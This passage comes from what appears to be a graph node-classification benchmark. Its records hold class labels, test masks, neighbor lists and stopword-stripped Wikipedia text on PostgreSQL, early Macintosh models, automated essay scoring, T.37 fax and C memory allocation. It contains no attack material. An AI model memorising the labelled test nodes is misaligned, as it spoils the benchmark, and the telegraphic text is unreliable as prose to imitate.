use linear regression machine learning techniques often combination statistical techniques latent semantic analysis bayesian inference method assessment must judged validity fairness reliability instrument valid actually measures trait purports measure fair effect penalize privilege one class people reliable outcome repeatable even irrelevant external factors altered computers entered picture high-stakes essays typically given scores two trained human raters scores differed one point third experienced rater would settle disagreement system easy way measure reliability inter-rater agreement raters consistently agree within one point training may fault rater consistently disagrees whichever raters look essays rater probably needs training various statistics proposed measure inter-rater agreement among percent agreement scott π cohen κ krippendorf α pearson correlation coefficient r spearman rank correlation coefficient ρ lin concordance correlation coefficient percent agreement simple statistic applicable grading scales scores 1 n usually 4 ≤ n ≤ 6 reported three figures percent total number essays scored exact agreement two raters gave essay score adjacent agreement raters differed one point includes exact agreement extreme disagreement raters differed two points expert human graders found achieve exact agreement 53 81 essays adjacent agreement 97 100 inter-rater agreement applied measuring computer performance set essays given two human raters aes program computer-assigned scores agree one human raters well raters agree aes program considered reliable alternatively essay given true score taking average two human raters scores two humans computer compared basis agreement true score researchers reported aes systems fact better human page made claim peg 1994 scott elliot said 2003 intellimetric typically outperformed human scorers aes machines however appear less reliable human readers kind complex writing test current practice high-stakes assessments gmat always scored least one human aes used place second rater human rater resolves disagreements one point aes criticized various grounds yang et al mention overreliance surface features responses insensitivity content responses creativity vulnerability new types cheating test-taking strategies several critics concerned students motivation diminished know human read writing among telling critiques reports intentionally gibberish essays given high scores march 12 2013 humanreaders.org launched online petition professionals machine scoring student essays high-stakes assessment within weeks petition gained thousands signatures including noam chomsky cited number newspapers including new york times number education technology blogs petition describes use aes high-stakes testing trivial reductive inaccurate undiagnostic unfair secretive detailed summary research aes petition site notes research findings show one—students parents teachers employers administrators legislators—can rely machine scoring essays ... machine scoring measure therefore promote authentic acts writing petition specifically addresses use aes high-stakes testing says nothing possible uses resources automated essay scoring proprietary",
    "neighbors": [
      5122,
      2440,
      2059,
      6798,
      11538,
      1044,
      5399,
      538,
      7599,
      4531,
      4662,
      3127,
      2488,
      10557,
      6208,
      3533,
      5197,
      6223,
      5857,
      7780,
      7918,
      8046,
      8688,
      10231,
      8440,
      7164
    ],
    "mask": "None"
  },
  {
    "node_id": 8539,
    "label": 1,
    "text": "PostgreSQL:postgresql postgresql also known postgres free open-source relational database management system rdbms emphasizing extensibility technical standards compliance designed handle range workloads single machines data warehouses web services many concurrent users default database macos server also available linux freebsd openbsd windows postgresql features transactions atomicity consistency isolation durability acid properties automatically updatable views materialized views triggers foreign keys stored procedures postgresql developed postgresql global development group diverse group many companies individual contributors postgresql developers pronounce postgresql abbreviated postgres ubiquitous support sql standard among relational databases originally named postgres name post ingres refers project origins rdbms originated university california berkeley review postgresql core team announced 2007 product would continue use name postgresql postgresql evolved ingres project university california berkeley 1982 leader ingres team michael stonebraker left berkeley make proprietary version ingres returned berkeley 1985 began post-ingres project address problems contemporary database systems become increasingly clear early 1980s turing award 2014 projects techniques pioneered new project postgres aimed add fewest features needed completely support data types features included ability define types fully describe relationships – something used widely maintained entirely user postgres database understood relationships could retrieve information related tables natural way using rules postgres used many ideas ingres code starting 1986 published papers described basis system prototype version shown 1988 acm sigmod conference team released version 1 small number users june 1989 followed version 2 re-written rules system june 1990 version 3 released 1991 re-wrote rules system added support multiple storage managers improved query engine 1993 number users began overwhelm project requests support features releasing version 4.2 june 30 1994 – primarily cleanup – project ended berkeley released postgres mit license variant enabled developers use code use time postgres used ingres-influenced postquel query language interpreter could interactively used console application named monitor 1994 berkeley graduate students andrew yu jolly chen replaced postquel query language interpreter one sql query language creating postgres95 monitor also replaced psql yu chen announced first version 0.01 beta testers may 5 1995 version 1.0 postgres95 announced september 5 1995 liberal license enabled software freely modifiable july 8 1996 marc fournier hub.org networking services provided first non-university development server open-source development effort participation bruce momjian vadim b. mikheev work began stabilize code inherited berkeley 1996 project renamed postgresql reflect support sql online presence website postgresql.org began october 22 1996 first postgresql release formed version 6.0 january 29 1997 since developers volunteers around world maintained software postgresql global development group project continues make releases available free open-source software postgresql license code comes contributions proprietary vendors support companies open-source programmers postgresql manages concurrency multiversion concurrency control mvcc gives transaction snapshot database allowing changes made without affecting transactions largely eliminates need read locks ensures database maintains acid principles postgresql offers three levels transaction isolation read committed repeatable read serializable postgresql immune dirty reads requesting read uncommitted transaction isolation level provides read committed instead postgresql supports full serializability via serializable snapshot isolation ssi method postgresql includes built-in binary replication based shipping changes write-ahead logs wal replica nodes asynchronously ability run read-only queries replicated nodes allows splitting read traffic among multiple nodes efficiently earlier replication software allowed similar read scaling normally relied adding replication triggers master increasing load postgresql includes built-in synchronous replication ensures write transaction master waits least one replica node written data transaction log unlike database systems durability transaction whether asynchronous synchronous specified per-database per-user per-session even per-transaction useful workloads require guarantees may wanted data slow performance due requirement confirmation transaction reaching synchronous standby standby servers synchronous asynchronous synchronous standby servers specified configuration determines servers candidates synchronous replication first list actively streaming used current synchronous server fails system fails next line synchronous multi-master replication included postgresql core postgres-xc based postgresql provides scalable synchronous multi-master replication licensed license postgresql related project called postgres-xl postgres-r yet another fork bidirectional replication bdr asynchronous multi-master replication system postgresql tools repmgr make managing replication clusters easier several asynchronous trigger-based replication packages available remain useful even introduction expanded core abilities situations binary replication full database cluster inappropriate postgresql includes built-in support regular b-tree hash table indexes four index access methods generalized search trees gist generalized inverted indexes gin space-partitioned gist sp-gist block range indexes brin addition user-defined index methods created although quite involved process indexes postgresql also support following features postgresql schema holds objects except roles tablespaces schemas effectively act like namespaces allowing objects name co-exist database default newly created databases schema called public schemas added public schema n't mandatory setting determines order postgresql checks schemas unqualified objects without prefixed schema default set refers currently connected database user default set database role level session parameter freely changed even multiple times client session affecting session non-existent schemas listed search_path silently skipped objects lookup new objects created whichever valid schema one presently exists appears first search_path.schema outline database wide variety native data types supported including addition users create data types usually made fully indexable via postgresql indexing infrastructures – gist gin sp-gist examples include geographic information system gis data types postgis project postgresql also data type called domain data type optional constraints defined creator domain means data entered column using domain conform whichever constraints defined part domain data type represents range data used called range types discrete ranges e.g integer values 1 10 continuous ranges e.g. time 10:00 11:00 built-in range types available include ranges integers big integers decimal numbers time stamps without time zone dates custom range types created make new types ranges available ip address ranges using inet type base float ranges using float data type base range types support inclusive exclusive range boundaries using characters respectively e.g. represents integers starting including 4 including 9 range types also compatible existing operators used check overlap containment right etc new types almost objects inside database created including tables set inherit characteristics parent table data child tables appear exist parent tables unless data selected parent table using keyword i.e adding column parent table cause column appear child table inheritance used implement table partitioning using either triggers rules direct inserts parent table proper child tables feature fully supported yet – particular table constraints currently inheritable check constraints not-null constraints parent table automatically inherited children types constraints unique primary key foreign key constraints inherited inheritance provides way map features generalization hierarchies depicted entity relationship diagrams erds directly postgresql database postgresql link systems retrieve data via foreign data wrappers fdws take form data source file system another relational database management system rdbms web service means regular database queries use data sources like regular tables even join multiple data-sources together postgresql several interfaces available also widely supported among programming language libraries built-in interfaces include libpq postgresql official c application interface ecpg embedded c system external interfaces include procedural languages allow developers extend database custom subroutines functions often called stored procedures functions used build database triggers functions invoked modification certain data custom data types aggregate functions procedural languages also invoked without defining function using command sql level languages divided two groups procedures written safe languages sandboxed safely created used user procedures written unsafe languages created superusers allow bypassing database security restrictions also access sources external database languages like perl provide safe unsafe versions postgresql built-in support three procedural languages addition postgresql allows procedural languages loaded database extensions three language extensions included postgresql support perl python tcl external projects add support many languages including java javascript pl/v8 r ruby others triggers events triggered action sql data manipulation language dml statements example insert statement might activate trigger checks values statement valid triggers activated either insert update statements triggers fully supported attached tables triggers per-column conditional update triggers target specific columns table triggers told execute set conditions specified trigger clause triggers attached views using instead condition multiple triggers fired alphabetical order addition calling functions written native pl/pgsql triggers also invoke functions written languages like pl/python pl/perl postgresql provides asynchronous messaging system accessed notify listen unlisten commands session issue notify command along user-specified channel optional payload mark particular event occurring sessions able detect events issuing listen command listen particular channel functionality used wide variety purposes letting sessions know table updated separate applications detect particular action performed system prevents need continuous polling applications see anything yet changed reducing unnecessary overhead notifications fully transactional messages sent transaction sent committed eliminates problem messages sent action performed rolled back many connectors postgresql provide support notification system including libpq jdbc npgsql psycopg node.js used external applications rules allow query tree incoming query rewritten query re-write rules attached table/class re-write incoming dml select insert update and/or delete one queries either replace original dml statement execute addition query re-write occurs dml statement parsing query planning postgresql server process-based threaded uses one operating system process per database session multiple sessions automatically spread across available cpus operating system starting postgresql 9.6 many types queries also parallelized across multiple background worker processes taking advantage multiple cpus cores client applications use threads create multiple database connections thread postgresql manages internal security per-role basis role generally regarded user role log group role roles members permissions granted revoked object column level also allow/prevent creation new objects database schema table levels postgresql security label feature extension sql standards allows additional security bundled loadable module supports label-based mandatory access control mac based security-enhanced linux selinux security policy postgresql natively supports broad number external authentication mechanisms including gssapi sspi kerberos peer ident certificate methods also use specified map file lists users matched authentication system allowed connect specific database user methods specified cluster host-based authentication configuration file pg_hba.conf determines connections allowed allows control user connect database connect ip address ip address range domain socket authentication system enforced whether connection must use transport layer security tls postgresql claims high complete conformance sql standard one exception handling unquoted identifiers like table column names postgresql folded – internal – lower case characters whereas standard says unquoted identifiers folded upper case thus equivalent according standard many informal performance studies postgresql done performance improvements aimed improving scalability began heavily version 8.1 simple benchmarks version 8.0 version 8.4 showed latter 10 times faster read-only workloads least 7.5 times faster read write workloads first industry-standard peer-validated benchmark completed june 2007 using sun java system application server proprietary version glassfish 9.0 platform edition ultrasparc t1-based sun fire server postgresql 8.2 result 778.14 specjappserver2004 jops standard compares favourably 874 jops standard oracle 10 itanium-based hp-ux system august 2007 sun submitted improved benchmark score 813.73 specjappserver2004 jops standard system test reduced price price/performance improved 84.98/jops 70.57/jops default configuration postgresql uses small amount dedicated memory performance-critical purposes caching database blocks sorting limitation primarily older operating systems required kernel changes allow allocating large blocks shared memory postgresql.org provides advice basic recommended performance practice wiki april 2012 robert haas enterprisedb demonstrated postgresql 9.2 linear cpu scalability using server 64 cores matloob khushi performed benchmarking postgresql 9.0 mysql 5.6.15 ability process genomic data performance analysis found postgresql extracts overlapping genomic regions eight times faster mysql using two datasets 80,000 forming random human dna regions insertion data uploads postgresql also better although general searching ability databases almost equivalent postgresql available following operating systems linux recent distributions windows windows 2000 sp4 later compilable e.g visual studio recent 2017 version freebsd openbsd netbsd macos os x aix hp-ux solaris unixware officially tested dragonfly bsd bsd/os irix openindiana opensolaris openserver tru64 unix unix-like systems could also work modern support postgresql works following instruction set architectures x86 x86-64 windows operating systems supported windows ia-64 itanium external support hp-ux powerpc powerpc 64 s/390 s/390x sparc sparc 64 armv8-a 64-bit older arm 32-bit including older armv6 raspberry pi mips mipsel pa-risc also known work alpha dropped 9.5 m68k m32r ns32k vax beyond possible build postgresql unsupported cpu disabling spinlocks open source front-ends tools administering postgresql include number companies offer proprietary tools postgresql often consist universal core adapted various specific database products tools mostly share administration features open source tools offer improvements data modeling importing exporting reporting notable organizations products use postgresql primary database include notable vendors offer postgresql software service",
    "neighbors": [
      6145,
      9729,
      3,
      3080,
      6153,
      1546,
      1035,
      8201,
      2062,
      1553,
      6166,
      1049,
      3609,
      5658,
      9245,
      3103,
      546,
      2083,
      1579,
      5165,
      5677,
      10286,
      3636,
      9782,
      4663,
      5691,
      6718,
      7234,
      580,
      5700,
      3142,
      9286,
      9290,
      6219,
      11338,
      8781,
      5198,
      7248,
      597,
      5723,
      7771,
      10843,
      2143,
      8291,
      1636,
      9828,
      5734,
      8295,
      3176,
      7273,
      10340,
      11363,
      3692,
      1135,
      8304,
      8312,
      4729,
      1146,
      5242,
      6780,
      10873,
      10367,
      11392,
      9348,
      3206,
      5768,
      9353,
      6797,
      10389,
      8863,
      11428,
      9386,
      10413,
      5806,
      8878,
      2225,
      692,
      11447,
      1211,
      700,
      11457,
      5827,
      3784,
      5833,
      5835,
      1232,
      7889,
      10961,
      6359,
      7895,
      10459,
      2780,
      734,
      8419,
      5356,
      9964,
      5358,
      9455,
      8944,
      11506,
      7411,
      7412,
      7930,
      8700,
      4861,
      4352,
      9481,
      5900,
      9997,
      788,
      5910,
      7446,
      1304,
      1816,
      6424,
      5403,
      10518,
      6943,
      11551,
      5929,
      10236,
      7983,
      8495,
      823,
      1849,
      2364,
      10048,
      5953,
      6465,
      3398,
      4423,
      5960,
      1353,
      10058,
      847,
      6993,
      11604,
      853,
      2395,
      5469,
      5470,
      863,
      864,
      4961,
      7523,
      5988,
      1383,
      4457,
      362,
      8554,
      4972,
      2413,
      7022,
      3951,
      7537,
      1399,
      2424,
      4984,
      11643,
      5506,
      899,
      6018,
      3462,
      8582,
      10632,
      1935,
      5523,
      4502,
      1943,
      10137,
      2970,
      1435,
      2972,
      2974,
      3487,
      929,
      2465,
      6049,
      7588,
      9634,
      10145,
      7080,
      5546,
      4011,
      5549,
      11191,
      7608,
      9144,
      10681,
      10172,
      9665,
      8644,
      5061,
      6607,
      2512,
      5074,
      467,
      6098,
      3541,
      4053,
      11218,
      11221,
      9177,
      4058,
      10201,
      479,
      5093,
      5096,
      6124,
      499,
      8691,
      3573,
      8181,
      10739,
      6651,
      8188,
      2045,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 8540,
    "label": 3,
    "text": "Macintosh_128K:macintosh 128k macintosh 128k originally released apple macintosh original apple macintosh personal computer beige case consisted crt monitor came keyboard mouse handle built top case made easier computer lifted carried initial selling price 2,495 macintosh introduced now-famous 370,000 television commercial ridley scott 1984 aired cbs third quarter super bowl xviii january 22 1984 sales macintosh strong initial release january 24 1984 reached 70,000 units may 3 1984 upon release successor macintosh 512k rebranded macintosh 128k computer model number heart computer motorola 68000 microprocessor running connected 128 kb ram shared processor display controller boot procedure operating system routines contained additional rom chip apple offer ram upgrades unlike apple ii source code listings macintosh system roms offered ram macintosh consisted sixteen 4164 64k×1 drams 68000 video controller took turns accessing dram every four cpu cycles display frame buffer 68000 unrestricted access dram vertical horizontal blanking intervals arrangement reduced overall performance cpu much 35 code display logic often blocked cpu access ram caused computer run slower several competitors despite nominally high clock rate mac 128s 512s commonly equipped micron-branded 4164 ram chips cost reasons however micron quality control poor chips common failure point built-in display one-bit black-and-white crt fixed resolution 512×342 pixels establishing desktop publishing standard 72 ppi expansion networking achieved using two non-standard rs-422 de-9 serial ports named printer modem support hardware handshaking external floppy disk drive could added using proprietary connector 19-pin d-sub keyboard mouse used simple proprietary protocols allowing third-party upgrades original keyboard arrow keys numeric keypad function keys intentional decision apple keys common older platforms thought addition keys would encourage software developers simply port existing applications mac rather design new ones around gui paradigm later apple would make numeric keypad available macintosh 128k keyboard sold newer macintosh plus model would include numeric keypad arrow keys still function keys apple lisa mouse single button standard headphones could also connected monaural jack apple also offered 300 1200 bit/s modems originally released apple ii line initially printer available apple imagewriter dot matrix printer designed produce 144 dpi wysiwyg output mac 72 dpi screen eventually laserwriter printers capable connected using appletalk apple built-in networking system macintosh contained single 400 kb single-sided -inch floppy disk drive dedicating space internal mechanical storage mac os disk-based beginning ram conserved startup disk could still temporarily ejected ejecting root filesystem remained unusual feature classic mac os system 7 one floppy disk sufficient store system software application data files created application indeed 400 kb drive capacity larger pc xt 360 kb 5.25-inch drive however sophisticated work environments time required separate disks documents system installation due memory constraints 128 kb original macintosh fact floppies could hold 400 kb users frequently swap disks floppy drive reason external floppy drives frequently used macintosh external disk drive mechanically identical internal one piggybacking controller popular add-on us 495 third-party hard drives considerably expensive usually connected slower serial port specified apple though manufacturers chose use faster nonstandard floppy port 128k use original macintosh file system storage unit include fan relying instead convection cooling made quiet operation steve jobs insisted macintosh ship without fan persisted introduction macintosh se 1987 allegedly source many common costly component failures first four macintosh models enough problem prompt introduction third-party external cooling fan fan unit fitted inside macintosh carrying-handle slot produced forced draft computer existing ventilation holes macintosh shipped first system finder application known public system 1.0 formally known system 0.97 finder 1.0 original macintosh saw three upgrades discontinued apple recommends system 2.0 finder 4.2 system 3.2 finder 5.3 maximum system 4.0 officially dropped support macintosh 128k distributed 800 kb floppy disks could used 128k applications macpaint macwrite bundled mac programs available included macproject macterminal microsoft word programming languages available time included macbasic macpascal macintosh 68000 development system macintosh also came manual unique guided tour cassette tape worked together guided tour diskette tutorial macintosh bundled applications since new macintosh users never used mouse much less manipulated graphical user interface computer released january 1984 simply apple macintosh following release macintosh 512k september expanded memory 128 kb 512 kb original macintosh re-branded macintosh 128k nicknamed thin mac new 512k model nicknamed fat mac functionally closed systems macintosh macintosh 128k technically two different computers re-badged 128k containing completely redesigned logic board easily accommodate 128 kb 512 kb ram configurations manufacturing though ram still permanently soldered logic board new design allowed easier though unsanctioned third-party upgrades 512 kb addition newer models contained 1984 revision b rom accommodate changes 400 kb floppy disk drive system software contains support unreleased macintosh 256k increased ram 512k vitally important macintosh finally allowed powerful software applications then-popular program microsoft multiplan however apple continued market 128k year entry-level computer mid-level 512k high-end lisa claiming could easily expanded user ever need ram jobs stated customization really mostly software ... options computers mac unlike apple ii macintosh 128k need slots described costly requiring larger size power upgradable user apple service centers permitted open case accessories external maccharlie added ibm pc compatibility provision adding internal storage ram upgrade cards however macintosh engineers objected jobs ideas secretly developed workarounds example macintosh supposed 17 address lines motherboard enough support 128k system ram design team added additional two address lines without jobs knowledge making possible expand computer 512k although actual act upgrading system ram difficult required piggybacking additional ram chips overtop onboard 4164 chips september 1984 months complaints mac inadequate ram apple released official 512k machine although always planned beginning steve jobs maintained user desired ram mac 128 provided simply pay extra money mac 512 rather upgrade computer mac 512 released apple rebranded original model macintosh 128k modified motherboard allow easier ram upgrades improving hard-wired ram thus required motherboard replacement priced similarly new computer third-party chip replacement upgrade expensive would void apple warranty difficulty fitting software limited free memory coupled new interface event driven programming model discouraged software vendors supporting leaving 128k relatively small software library whereas macintosh plus lesser extent macintosh 512k compatible much later software 128k limited specially crafted programs stock mac 128k original 64k rom neither compatible apple external 800 kb drive hfs apple hard disk 20 mac 128k upgraded newer 128k rom called macintosh 128ke use internal external 800 kb drives hfs well hd20 print appleshare network neither file sharing limited ram early 1985 much macintosh software required 512k memory apple sold official memory upgrade macintosh 128k included motherboard replacement effectively making macintosh 512k price us 995 additionally apple offered 800 kb floppy disk drive kit including updated 128k roms finally mac 128k could upgraded macintosh plus swapping logic board well case back accommodate slightly different port configuration optionally adding macintosh plus extended keyboard kits could purchased alone together time partial full upgrade macintosh 128k upgrades required performed professional apple technicians reportedly refused work macintosh upgraded 512k without apple official upgrade us 700 much expensive 300 third-party versions original macintosh unusual included signatures macintosh division early 1982 molded inside case names peggy alexio colette askeland bill atkinson steve balog bob belleville mike boich bill bull matt carter berry cash debi coleman george crow donn denman christopher espinosa bill fernandez martin haeberli andy hertzfeld joanna hoffman rod holt bruce horn hap horn brian howard steve jobs larry kenyon patti king daniel kottke angeline lo ivan mach jerrold manock mary ellen mccammon vicki milledge mike murray ron nicholson jr. terry oyama benjamin pang jef raskin ed riddle brian robertson dave roots patricia sharp burrell smith bryan stearns lynn takahashi guy bud tribble randy wigginton linda wilkin steve wozniak pamela wyman laszlo zidek macintosh 128/512k models also included easter eggs os rom user went system debugger typed codice_1 graphic reading stolen apple computers would appear upper left corner screen designed prevent unauthorized cloning macintosh numerous apple ii clones appeared many simply stole apple copyrighted system roms steve jobs allegedly planned macintosh clone appeared market court case happened could access easter egg computer prove using pirated macintosh roms macintosh se would later augment easter egg slideshow 4 photos apple design team codice_2 entered erik sandberg-diment new york times january 1984 stated macintosh presages revolution personal computing although preferring larger screens calling lack color mistake praised refreshingly crisp clear display lack fan noise unsure whether would become second standard big blue ronald rosenberg boston globe wrote february euphoria macintosh change america computes anyone tries pint-size machine gets hooked features gregg williams byte month found hardware software design predicted would imitated copied impressive criticized lack standard second disk drive predicted computer would popularize 3½-inch floppy disk drive standard macintosh would improve apple reputation delay ibm domination personal computer market williams concluded macintosh important development computers last five years brings us one step closer ideal computer appliance follow-up article may 1984 issue byte williams added initial reaction macintosh strongly overpoweringly favorable traditional computer users see mouse windows desktop metaphor silly useless frills others outraged lack color graphics users impressed machine capabilities still people expressed concern relatively small 128k-byte ram size lack computer language sent part basic unit inconvenience single disk drive jerry pournelle also byte added macintosh bargain get heavily discounted price offered faculty students favored 24 universities macintosh consortium noted however macintosh attracted people previously hated computers ... apparently something mice pull-down menus icons appeal people previously intimidated like",
    "neighbors": [
      3598,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      9778,
      8253,
      576,
      1090,
      4180,
      10838,
      10840,
      9312,
      7269,
      8806,
      8301,
      6258,
      7285,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7335,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      2282,
      1772,
      6895,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      2839,
      8480,
      10023,
      4910,
      7983,
      4409,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      6495,
      8544,
      1389,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      6554,
      3483,
      2979,
      11171,
      8109,
      8114,
      446,
      5058,
      6594,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      6129,
      6130,
      5619,
      11251,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 8541,
    "label": 5,
    "text": "T.37:t.37 t.37 itu standard deals sending fax messages using email also referred ifax internet fax store-forward-fax fax machine supporting t.37 send fax email address converting document tiff-f image attaching email using mime format sending document using smtp destination fax receives email prints attached document interface regular fax machines",
    "neighbors": [
      6880,
      9909
    ],
    "mask": "None"
  },
  {
    "node_id": 8542,
    "label": 3,
    "text": "Gnome_Ranger:gnome ranger gnome ranger text adventure game level 9 released 1987 followed sequel titled ingrid back gnome ingrid bottomlow displeased family un-gnomelike behaviour going university getting education teleported village faulty scroll must find way back.. game standard text adventure limited graphics platforms comes short novella peter mcbride gnettlefield journal explaining ingrid predicament setting background story gameplay similar earlier level 9 adventure knight orc uses game engine kaos player must explore settings collecting useful items interacting various non-player characters solve puzzles problems game takes place three areas characterized non-player characters ingrid meet first contains characters animal nature second vegetable nature third mineral nature",
    "neighbors": [
      9674,
      8650,
      9166,
      9006,
      10931
    ],
    "mask": "None"
  },
  {
    "node_id": 8543,
    "label": 3,
    "text": "Millicode:millicode computer architecture millicode higher level microcode used implement instruction set computer millicode runs top microcoded instructions uses instructions implement complex instructions visible user system implementation millicode requires special processor mode called millimode provides set registers possibly special instructions invisible user ibm invented concept term millicode system/390 9672-g4 processor 1997 following cited advantages millicode i370 code capitol chipset used es/9370 models similar millicode written combination system/370 instructions code access special hardware features",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      2638,
      3175,
      8815,
      6268,
      3197,
      7313,
      6815,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      2805,
      249,
      3323,
      1798,
      1801,
      6926,
      6415,
      11539,
      2339,
      6950,
      3886,
      309,
      8502,
      8501,
      5948,
      8514,
      4423,
      7505,
      9044,
      344,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      3470,
      5518,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      4030,
      453,
      466,
      1499,
      7134,
      5090,
      995,
      7653,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 8544,
    "label": 3,
    "text": "Macintosh_512K:macintosh 512k macintosh 512k personal computer designed manufactured sold apple computer inc. september 1984 april 1986 first update original macintosh 128k virtually identical previous macintosh differing primarily amount built-in random-access memory increased memory turned macintosh business-capable computer gained ability run software mac 512k originally shipped macintosh system 1.1 able run versions mac os system 4.1 replaced macintosh 512ke macintosh plus support mac 512k discontinued september 1 1998 like macintosh 128k 512k contained motorola 68000 connected 512 kb dram 16-bit data bus though memory quadrupled could upgraded large increase earned nickname fat mac 64 kb rom chip boosts effective memory 576 kb offset display 22 kb framebuffer shared dma video controller shared arrangement reduces cpu performance 35 shared revised logic board re-badged macintosh 128k previously called macintosh streamlined manufacturing resolution display 512x342 apple sold memory upgrade macintosh 128k 995 initially reduced price 256k dram prices fell months later applications macpaint macwrite still bundled mac soon model released several applications became available including macdraw macproject macintosh pascal others particular microsoft excel written specifically macintosh required minimum 512 kb ram solidified macintosh serious business computer models enhanced rom also supported apple switcher allowing cooperative multitasking among necessarily applications laserwriter printer became available shortly 512k introduction well number pad mic tablet keyboard mouse basic mouse much utilized apple built-in networking scheme localtalk allows sharing devices among several users 512k oldest macintosh capable supporting apple appleshare built-in file sharing network introduced 1987 expanded memory 512k allowed better handle large word-processing documents make better use graphical user interface generally increased speed 128k model original 512k could accept macintosh system software version 4.1 system software 5 possible used hard disk 20 updated version replaced macintosh 512k debuted macintosh 512k enhanced april 1986 differed original 512k 800 kb floppy disk drive improved rom macintosh plus exception new model number m0001e otherwise cosmetically identical stock 512k could also use 800 kb floppy disk drive well hard disk 20 first hard disk manufactured apple exclusively use 512k required special system file required 512k e loaded improved rom code ram thus reducing available ram uses apple offered upgrade kit replaced floppy disk drive roms essentially turning 512k e one oem upgrade replaced logicboard rear case entirely macintosh plus original macintosh 512k designed slots upgrade boards hard-disk controller internal upgrades available 512k general computer us 2,795 hyperdrive hard drive plug directly 68000 processor socket upgrades included snap-on scsi cards ram upgrades 2 mb",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      576,
      1090,
      4180,
      10838,
      10840,
      9312,
      7269,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7335,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      1772,
      1776,
      10481,
      11011,
      1290,
      781,
      4879,
      784,
      2839,
      8480,
      10023,
      2345,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2383,
      2388,
      8534,
      3928,
      8540,
      9565,
      6495,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      11171,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 8545,
    "label": 2,
    "text": "C_dynamic_memory_allocation:c dynamic memory allocation c dynamic memory allocation refers performing manual memory management dynamic memory allocation c programming language via group functions c standard library namely c++ programming language includes functions however operators provide similar functionality recommended language authors still myriad situations using codice_1 applicable garbage collection code performance-sensitive code combination codice_2 codice_3 may required instead higher-level codice_4 operator many different implementations actual memory allocation mechanism used available performance varies execution time required memory c programming language manages memory statically automatically dynamically static-duration variables allocated main memory usually along executable code program persist lifetime program automatic-duration variables allocated stack come go functions called return static-duration automatic-duration variables size allocation must compile-time constant except case variable-length automatic arrays required size known run-time example data arbitrary size read user disk file using fixed-size data objects inadequate lifetime allocated memory also cause concern neither static- automatic-duration memory adequate situations automatic-allocated data persist across multiple function calls static data persists life program whether needed many situations programmer requires greater flexibility managing lifetime allocated memory limitations avoided using dynamic memory allocation memory explicitly flexibly managed typically allocating free store informally called heap area memory structured purpose c library function codice_2 used allocate block memory heap program accesses block memory via pointer codice_2 returns memory longer needed pointer passed codice_7 deallocates memory used purposes platforms provide library calls allow run-time dynamic allocation c stack rather heap e.g codice_8 memory automatically freed calling function ends c dynamic memory allocation functions defined codice_9 header codice_10 header c++ creating array ten integers automatic scope straightforward c however size array fixed compile time one wishes allocate similar array dynamically following code used computes number bytes ten integers occupy memory requests many bytes codice_2 assigns result pointer named codice_19 due c syntax pointers arrays used interchangeably situations codice_2 might able service request might return null pointer good programming practice check program longer needs dynamic array must eventually call codice_7 return memory occupies free store memory set aside codice_2 initialized may contain cruft remnants previously used discarded data allocation codice_2 elements array uninitialized variables command codice_24 return allocation already cleared realloc resize amount memory pointer points example pointer acting array size formula_1 want change array size formula_2 use realloc note realloc must assumed changed base address block i.e failed extend size original block therefore allocated new larger block elsewhere copied old contents therefore pointers addresses within original block also longer valid codice_2 returns void pointer codice_26 indicates pointer region unknown data type use casting required c++ due strong type system whereas case c. lack specific pointer type returned codice_2 type-unsafe behaviour according programmers codice_2 allocates based byte count type different c++ new operator returns pointer whose type relies operand see c type safety one may cast see type conversion pointer specific type advantages disadvantages performing cast improper use dynamic memory allocation frequently source bugs include security bugs program crashes often due segmentation faults common errors follows implementation memory management depends greatly upon operating system architecture operating systems supply allocator malloc others supply functions control certain regions data dynamic memory allocator often used implement codice_2 operator codice_4 c++ implementation allocator commonly done using heap data segment allocator usually expand contract heap fulfill allocation requests heap method suffers inherent flaws stemming entirely fragmentation like method memory allocation heap become fragmented sections used unused memory allocated space heap good allocator attempt find unused area already allocated memory use resorting expanding heap major problem method heap two significant attributes base beginning heap virtual memory space length size heap requires enough system memory fill entire length base never change thus large areas unused memory wasted heap get stuck position small used segment exists end heap could waste amount address space lazy memory allocation schemes often found linux operating system large heap necessarily reserve equivalent system memory first write time reads non-mapped memory pages return zero granularity depends page size doug lea developed dlmalloc doug lea malloc general-purpose allocator starting 1987 gnu c library glibc uses ptmalloc allocator based dlmalloc memory heap allocated chunks 8-byte aligned data structure contains header usable memory allocated memory contains 8 16 byte overhead size chunk usage flags unallocated chunks also store pointers free chunks usable space area making minimum chunk size 16 bytes 32-bit systems 24/32 depends alignment bytes 64-bit systems unallocated memory grouped bins similar sizes implemented using 